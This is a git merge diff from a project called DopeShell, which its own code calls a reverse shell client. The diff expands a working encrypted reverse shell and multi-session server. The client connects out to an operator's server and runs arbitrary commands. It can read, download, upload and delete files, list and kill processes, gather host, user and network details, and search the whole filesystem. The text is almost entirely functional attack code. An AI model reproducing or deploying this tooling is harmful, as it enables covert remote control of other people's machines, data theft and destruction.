Merge branch 'main' of https://github.com/manaswii/DopeShellPyPi

Author: manaswii

DopeShell/client.py

@@ -3,7 +3,12 @@
 import socket
 import subprocess
 import os
+import getpass
+import platform
+import shutil
 import base64
+import struct
+import psutil
 import argparse
 from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
 from cryptography.hazmat.backends import default_backend
@@ -16,6 +21,13 @@ def __init__(self, server_ip, server_port, key):
         self.key = key
         self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
+    def send_data(self, data):
+        encrypted_data = self.encrypt(data)
+        # Send the length of the data first
+        self.sock.send(struct.pack('>I', len(encrypted_data)))
+        # Send the actual data
+        self.sock.sendall(encrypted_data)
+
     def encrypt(self, data):
         iv = os.urandom(16)
         cipher = Cipher(algorithms.AES(self.key), modes.CFB(iv), backend=default_backend())
@@ -59,12 +71,159 @@ def run(self):
         self.sock.connect((self.server_ip, self.server_port))
         while True:
             command = self.decrypt(self.sock.recv(4096)).decode('utf-8')
+            
             if command.lower() == 'exit':
                 break
-            output = self.execute_command(command)
-            self.sock.send(self.encrypt(output))
+
+            elif command.lower() == 'info':
+                try:
+                    hostname = socket.gethostname()
+                    local_ip = socket.gethostbyname(hostname)
+                except:
+                    local_ip = "Unable to fetch IP"
+
+                client_info = (
+                    f"OS: {platform.system()} {platform.release()}\n"
+                    f"Architecture: {platform.machine()}\n"
+                    f"Hostname: {platform.node()}\n"
+                    f"Processor: {platform.processor()}\n"
+                    f"Current User: {getpass.getuser()}\n"
+                    f"Local IP Address: {local_ip}\n"
+                )
+                self.sock.send(self.encrypt(client_info.encode('utf-8')))
+
+            elif command.lower().startswith('ls'):
+                directory = command.split()[1] if len(command.split()) > 1 else '.'
+                try:
+                    files = "\n".join(os.listdir(directory))
+                except FileNotFoundError:
+                    files = f"[-] Directory '{directory}' not found."
+                self.sock.send(self.encrypt(files.encode('utf-8')))
+
+            elif command.lower() == 'pwd':
+                cwd = os.getcwd()
+                self.sock.send(self.encrypt(cwd.encode('utf-8')))
+
+            elif command.lower().startswith('cd'):
+                directory = command.split()[1] if len(command.split()) > 1 else '.'
+                try:
+                    os.chdir(directory)
+                    self.sock.send(self.encrypt(b"[+] Changed directory."))
+                except FileNotFoundError:
+                    self.sock.send(self.encrypt(f"[-] Directory '{directory}' not found.".encode('utf-8')))
+
+            elif command.lower().startswith('download'):
+                _, file_path = command.split()
+                try:
+                    with open(file_path, 'rb') as f:
+                        while chunk := f.read(4096):
+                            self.sock.send(self.encrypt(chunk))
+                    self.sock.send(self.encrypt(b'EOF'))
+                except FileNotFoundError:
+                    self.sock.send(self.encrypt(b"[-] File not found."))
+
+            elif command.lower().startswith('upload'):
+                _, file_name = command.split()
+                with open(file_name, 'wb') as f:
+                    while True:
+                        file_data = self.decrypt(self.sock.recv(4096))
+                        if file_data == b'EOF':
+                            break
+                        f.write(file_data)
+                self.sock.send(self.encrypt(b"[+] File upload complete."))
+
+            elif command.lower().startswith('mkdir'):
+                _, directory = command.split(' ', 1)
+                try:
+                    os.makedirs(directory)
+                    output = f"Directory '{directory}' created successfully."
+                except Exception as e:
+                    output = f"Failed to create directory '{directory}': {e}"
+                self.sock.send(self.encrypt(output.encode('utf-8')))
+
+            elif command.lower().startswith('delete'):
+                _, file_path = command.split(' ', 1)
+                try:
+                    os.remove(file_path)
+                    output = f"File '{file_path}' deleted successfully."
+                except Exception as e:
+                    output = f"Failed to delete file '{file_path}': {e}"
+                self.sock.send(self.encrypt(output.encode('utf-8')))
+
+            elif command.lower() == 'ps':
+                processes = ""
+                for proc in psutil.process_iter(['pid', 'name', 'username']):
+                    processes += f"PID: {proc.info['pid']}, Name: {proc.info['name']}, User: {proc.info['username']}\n"
+                self.send_data(processes.encode('utf-8'))
+
+            elif command.lower().startswith('kill'):
+                _, pid = command.split(' ', 1)
+                try:
+                    os.kill(int(pid), 9)
+                    output = f"Process {pid} killed successfully."
+                except Exception as e:
+                    output = f"Failed to kill process {pid}: {e}"
+                self.sock.send(self.encrypt(output.encode('utf-8')))
+
+            elif command.lower().startswith('cat'):
+                try:
+                    _, file_path = command.split(maxsplit=1)
+                    if os.path.exists(file_path) and os.path.isfile(file_path):
+                        with open(file_path, 'rb') as file:
+                            file_content = file.read()
+                        self.send_data(file_content)
+                    else:
+                        error_message = f"File {file_path} does not exist or is not a file."
+                        self.send_data(error_message.encode('utf-8'))
+                except Exception as e:
+                    error_message = f"Error reading file: {str(e)}"
+                    self.send_data(error_message.encode('utf-8'))
+
+            elif command.lower() == 'netstat':
+                netstat_output = subprocess.check_output('netstat -an', shell=True)
+                self.send_data(netstat_output)
+
+            elif command.lower() == 'clear':
+                # Clear screen command for the client shell (may not be fully visible in reverse shell setup)
+                output = "\033c"
+                self.sock.send(self.encrypt(output.encode('utf-8')))
+
+            elif command.lower() in ['ifconfig', 'ipconfig']:
+                if platform.system() == 'Windows':
+                    ifconfig_output = subprocess.check_output('ipconfig', shell=True)
+                else:
+                    ifconfig_output = subprocess.check_output('ifconfig', shell=True)
+                self.send_data(ifconfig_output)
+
+            elif command.lower().startswith('find'):
+                _, filename = command.split(' ', 1)
+                matches = ""
+                for root, dirs, files in os.walk('/'):
+                    if filename in files:
+                        matches += os.path.join(root, filename) + "\n"
+                if matches:
+                    self.send_data(matches)
+                else:
+                    output = f"No matches found for '{filename}'."
+                    self.sock.send(self.encrypt(output.encode('utf-8')))
+
+            elif command.lower() == 'sysinfo':
+                sys_info = (
+                    f"System: {platform.system()} {platform.release()}\n"
+                    f"Machine: {platform.machine()}\n"
+                    f"Processor: {platform.processor()}\n"
+                    f"RAM: {round(psutil.virtual_memory().total / (1024**3), 2)} GB\n"
+                    f"Disk: {round(psutil.disk_usage('/').total / (1024**3), 2)} GB\n"
+                )
+                self.sock.send(self.encrypt(sys_info.encode('utf-8')))
+
+            else:
+                output = self.execute_command(command)
+                self.sock.send(self.encrypt(output))
+
         self.sock.close()
 
+
 def main():
     parser = argparse.ArgumentParser(description="DopeShell Reverse Shell Client")
     parser.add_argument("--server-ip", type=str, required=True, help="IP address of the server to connect to")

DopeShell/server.py

@@ -4,6 +4,8 @@
 import threading
 import base64
 import os
+import struct
+import platform
 import argparse
 from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
 from cryptography.hazmat.backends import default_backend
@@ -19,6 +21,37 @@ def __init__(self, host, port, key):
         self.sessions = {}
         self.session_counter = 1
         self.active_session = None
+        self.commands = {
+            'help': 'List all commands and their usage.',
+            'exit': 'Terminate the session.',
+            'switch <session_id>': 'Switch to another active session.',
+            'sessions': 'List all active sessions.',
+            'upload <local_path> <remote_path>': 'Upload a file from the local machine to the remote machine.',
+            'download <remote_path> <local_path>': 'Download a file from the remote machine to the local machine.',
+            'pwd': 'Print the current working directory on the remote machine.',
+            'cd <directory>': 'Change the current working directory on the remote machine.',
+            'ls [directory]': 'List files in the specified or current directory on the remote machine.',
+            'ps': 'List running processes on the remote machine.',
+            'netstat': 'Show network connections on the remote machine.',
+            'ifconfig/ipconfig': 'Show network configuration (depending on OS).',
+            'cat <file_path>': 'Display the contents of a file on the remote machine.',
+            'info': 'Display system information of the remote machine.',
+            'mkdir <directory>': 'Create a new directory on the remote machine.',
+            'delete <file_path>': 'Delete a file on the remote machine.',
+            'kill <pid>': 'Kill a process on the remote machine by PID.',
+            'clear': 'Clear the screen in the shell.',
+            'find <filename>': 'Find a file by name on the remote machine.',
+            'sysinfo': 'Display detailed system information.',
+        }
+
+    def receive_data(self, client_socket):
+        # Read the data length first
+        data_length = struct.unpack('>I', client_socket.recv(4))[0]
+        data = b""
+        while len(data) < data_length:
+            chunk = client_socket.recv(4096)
+            data += chunk
+        return self.decrypt(data)
 
     def encrypt(self, data):
         iv = os.urandom(16)
@@ -40,9 +73,93 @@ def handle_client(self, session_id, client_socket):
             if session_id != self.active_session:
                 continue
             command = input(f"Session {session_id} Shell> ")
+            
             if command.lower() == 'exit':
                 client_socket.send(self.encrypt(command.encode('utf-8')))
                 break
+
+            if command.lower().startswith('help'):
+                parts = command.split(maxsplit=1)
+                if len(parts) > 1:
+                    specific_command = parts[1].lower()
+                    description = self.commands.get(specific_command, "Command not found.")
+                    help_text = f"{specific_command}: {description}"
+                else:
+                    help_text = "DopeShell Tool Help\n" \
+                                "====================\n" \
+                                "List of available commands:\n"
+                    for cmd, desc in self.commands.items():
+                        help_text += f"  {cmd:<30} - {desc}\n"
+                    help_text += "\nFor detailed information on a specific command, type 'help <command>'"
+                
+                print(help_text)
+                client_socket.send(self.encrypt(help_text.encode('utf-8')))
+                continue
+
+            elif command.lower().startswith('ls'):
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
+            elif command.lower().startswith('pwd'):
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
+            elif command.lower().startswith('cd'):
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
+            elif command.lower().startswith('download'):
+                _, remote_path = command.split()
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                with open(os.path.basename(remote_path), 'wb') as f:
+                    while True:
+                        file_data = self.decrypt(client_socket.recv(4096))
+                        if file_data == b'EOF':
+                            break
+                        f.write(file_data)
+                print(f"[+] Downloaded {remote_path} from the client.")
+
+            elif command.lower().startswith('upload'):
+                _, local_path = command.split()
+                client_socket.send(self.encrypt(f"upload {os.path.basename(local_path)}".encode('utf-8')))
+                with open(local_path, 'rb') as f:
+                    while chunk := f.read(4096):
+                        client_socket.send(self.encrypt(chunk))
+                client_socket.send(self.encrypt(b'EOF'))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
+            elif command.lower() == 'info':
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
+            elif command.lower() in ['mkdir', 'delete', 'kill', 'clear', 'find', 'sysinfo']:
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
+            elif command.lower().startswith('cat'):
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = self.receive_data(client_socket)
+                print(response.decode('utf-8'))
+
+            elif command.lower() in ['ifconfig', 'ipconfig', 'find']:
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = self.receive_data(client_socket)
+                print(response.decode('utf-8'))
+
+            elif command.lower() in ['ps', 'netstat']:
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = self.receive_data(client_socket)
+                print(response.decode('utf-8'))
+            
+            elif command.lower() == 'sessions':
+                self.list_sessions()
+
             elif command.lower().startswith("switch"):
                 _, new_session_id = command.split()
                 if int(new_session_id) in self.sessions:
@@ -51,14 +168,20 @@ def handle_client(self, session_id, client_socket):
                 else:
                     print(f"[-] Session {new_session_id} does not exist.")
                 continue
-            client_socket.send(self.encrypt(command.encode('utf-8')))
-            response = client_socket.recv(4096)
-            print(self.decrypt(response).decode('utf-8'))
+            else:
+                client_socket.send(self.encrypt(command.encode('utf-8')))
+                response = client_socket.recv(4096)
+                print(self.decrypt(response).decode('utf-8'))
+
         client_socket.close()
+        del self.sessions[session_id]  # Remove session on exit
+        if not self.sessions:
+            self.active_session = None  # Reset active session if no sessions remain
+
 
     def run(self):
         print(f"[*] Listening on {self.host}:{self.port}")
-        while True:
+        while True: 
             client_socket, addr = self.sock.accept()
             session_id = self.session_counter
             print(f"[*] Connection from {addr}, Session ID: {session_id}")